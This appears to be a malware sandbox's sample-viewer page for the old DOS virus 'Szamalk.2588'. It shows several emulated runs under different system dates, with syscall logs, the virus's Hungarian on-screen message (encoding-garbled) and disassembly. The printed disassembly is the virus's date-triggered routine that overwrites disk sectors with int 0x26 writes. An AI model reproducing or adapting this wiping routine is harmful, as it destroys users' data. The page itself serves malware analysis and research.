Sample viewer

vx.netlux.org/Virus.DOS.Szamalk.2588

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:47.048967461Z 26 PC: 13779 | Set disk transfer address
2018-12-17T23:00:47.051642342Z 42 PC: 1377d | Get date
0x1377d: cmp cx, 0x7ca
0x13781: jae 0x13786
0x13783: jmp 0x1388b
0x13786: cmp dh, 9
0x13789: jae 0x1378e
0x1378b: jmp 0x1388b
0x1378e: mov al, 2
0x13790: push ax
0x13791: mov cx, 0x80
0x13794: mov dx, word ptr [0x142]
0x13798: push ds
0x13799: mov bx, 0
0x1379c: mov ds, bx
0x1379e: int 0x26
0x137a0: popf
0x137a1: pop ds
0x137a2: add word ptr [0x142], 0x80
0x137a8: pop ax
0x137a9: cmp word ptr [0x142], 0x1000
0x137af: jb 0x13790
2018-12-17T23:00:47.075887044Z 9 PC: 137ea | Display string (String= '***** Terjed�si k�s�rlet Terjed�si id�szak: 1994.06.01.-1994.09.01. *****')
2018-12-17T23:00:47.079991058Z 9 PC: 137ea | Display string (String= 'A k�s�rlet a mai napon befejez�d�tt. A visszaigazol�sok')
2018-12-17T23:00:47.084756854Z 9 PC: 137ea | Display string (String= 'miatt az �n merevlemeze(i) m�r haszn�lhatatlanok. Bocs!')
2018-12-17T23:00:47.088508996Z 9 PC: 137ea | Display string (String= 'Hogy miel�bb elk�sz�lhessen az ezt a v�rust �rt�, �rt� j� v�-')
2018-12-17T23:00:47.09222113Z 9 PC: 137ea | Display string (String= 'rus�rt� program,k�rj�k �rjon valamelyik sz�m�t�stechnikai saj')
2018-12-17T23:00:47.095026975Z 9 PC: 137ea | Display string (String= '-t�org�numnak. A k�s�rlet eredm�ny�nek figyel�s�vel a k�vetke')
2018-12-17T23:00:47.099160006Z 9 PC: 137ea | Display string (String= '-z� hazai lapok lettek megb�zva: CHIP, ALAPLAP, COMPUTER Pano')
2018-12-17T23:00:47.102912738Z 9 PC: 137ea | Display string (String= '-r�ma (�m�t�stechnika haland�knak). Teh�t �rja meg hogy a k�-')
2018-12-17T23:00:47.106860738Z 9 PC: 137ea | Display string (String= 's�rlet eredm�nyes volt-e ! Seg�t�k�sz egy�ttm�k�d�se seg�t-')
2018-12-17T23:00:47.110915797Z 9 PC: 137ea | Display string (String= 's�g a gal�d v�rus�r�kkal szemben viselt szent h�bor�nkban !!!')
2018-12-17T23:00:47.11495587Z 9 PC: 137ea | Display string (String= '(B�r ki nem �rtjuk �ket, csak a v�rusaikat, mert nek�nk is �l')
2018-12-17T23:00:47.119064528Z 9 PC: 137ea | Display string (String= '-ni kell valamib�l !) Ne agg�djon ! Leperk�l n�h�nyezer forin')
2018-12-17T23:00:47.131255064Z 9 PC: 137ea | Display string (String= '-tot, �s mi k�ldj�k az �rt� j� v�rus�rt�nkat ! Persze te osto')
2018-12-17T23:00:47.135797048Z 9 PC: 137ea | Display string (String= '-ba, n�h�ny napon bel�l �j v�rusok sz�letnek , �s te perk�lsz')
2018-12-17T23:00:47.14035609Z 9 PC: 137ea | Display string (String= '�jra, mi meg gyarapodunk, de ilyen az �let. Seggfej ! M�sol-')
2018-12-17T23:00:47.145485589Z 9 PC: 137ea | Display string (String= 'gass csak �sz n�lk�l ezent�l is, mert ez nek�nk nagyon j� !!!')
2018-12-17T23:00:47.150045812Z 9 PC: 137ea | Display string (String= '�zleti �dv�zlettel: Rudnai Tam�s , Szegedi Imre , Kiss J�nos')
2018-12-17T23:00:47.154191649Z 9 PC: 137ea | Display string (String= 'A v�rus sz�let�si d�tuma: 1994.08.11. (0000004. p�ld�ny)')

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13646,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:39.975498118Z 26 PC: 13779 | Set disk transfer address
2018-12-25T12:38:39.977851244Z 42 PC: 1377d | Get date
0x1377d: cmp cx, 0x7ca
0x13781: jae 0x13786
0x13783: jmp 0x1388b
0x13786: cmp dh, 9
0x13789: jae 0x1378e
0x1378b: jmp 0x1388b
0x1378e: mov al, 2
0x13790: push ax
0x13791: mov cx, 0x80
0x13794: mov dx, word ptr [0x142]
0x13798: push ds
0x13799: mov bx, 0
0x1379c: mov ds, bx
0x1379e: int 0x26
0x137a0: popf
0x137a1: pop ds
0x137a2: add word ptr [0x142], 0x80
0x137a8: pop ax
0x137a9: cmp word ptr [0x142], 0x1000
0x137af: jb 0x13790
2018-12-25T12:38:39.993520907Z 37 PC: 13a05 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:38:39.994666095Z 26 PC: 13a4e | Set disk transfer address
2018-12-25T12:38:39.996783454Z 76 PC: 12a55 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13646,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:40.066322598Z 26 PC: 13779 | Set disk transfer address
2018-12-25T12:38:40.070112248Z 42 PC: 1377d | Get date
0x1377d: cmp cx, 0x7ca
0x13781: jae 0x13786
0x13783: jmp 0x1388b
0x13786: cmp dh, 9
0x13789: jae 0x1378e
0x1378b: jmp 0x1388b
0x1378e: mov al, 2
0x13790: push ax
0x13791: mov cx, 0x80
0x13794: mov dx, word ptr [0x142]
0x13798: push ds
0x13799: mov bx, 0
0x1379c: mov ds, bx
0x1379e: int 0x26
0x137a0: popf
0x137a1: pop ds
0x137a2: add word ptr [0x142], 0x80
0x137a8: pop ax
0x137a9: cmp word ptr [0x142], 0x1000
0x137af: jb 0x13790
2018-12-25T12:38:40.072815436Z 37 PC: 13a05 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:38:40.074133332Z 26 PC: 13a4e | Set disk transfer address
2018-12-25T12:38:40.075356884Z 76 PC: 12a55 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13646,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:40.613212133Z 26 PC: 13779 | Set disk transfer address
2018-12-25T12:38:40.616042206Z 42 PC: 1377d | Get date
0x1377d: cmp cx, 0x7ca
0x13781: jae 0x13786
0x13783: jmp 0x1388b
0x13786: cmp dh, 9
0x13789: jae 0x1378e
0x1378b: jmp 0x1388b
0x1378e: mov al, 2
0x13790: push ax
0x13791: mov cx, 0x80
0x13794: mov dx, word ptr [0x142]
0x13798: push ds
0x13799: mov bx, 0
0x1379c: mov ds, bx
0x1379e: int 0x26
0x137a0: popf
0x137a1: pop ds
0x137a2: add word ptr [0x142], 0x80
0x137a8: pop ax
0x137a9: cmp word ptr [0x142], 0x1000
0x137af: jb 0x13790
2018-12-25T12:38:40.619625104Z 37 PC: 13a05 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:38:40.621303698Z 26 PC: 13a4e | Set disk transfer address
2018-12-25T12:38:40.623473262Z 76 PC: 12a55 | Terminate with return code (Return code = '0')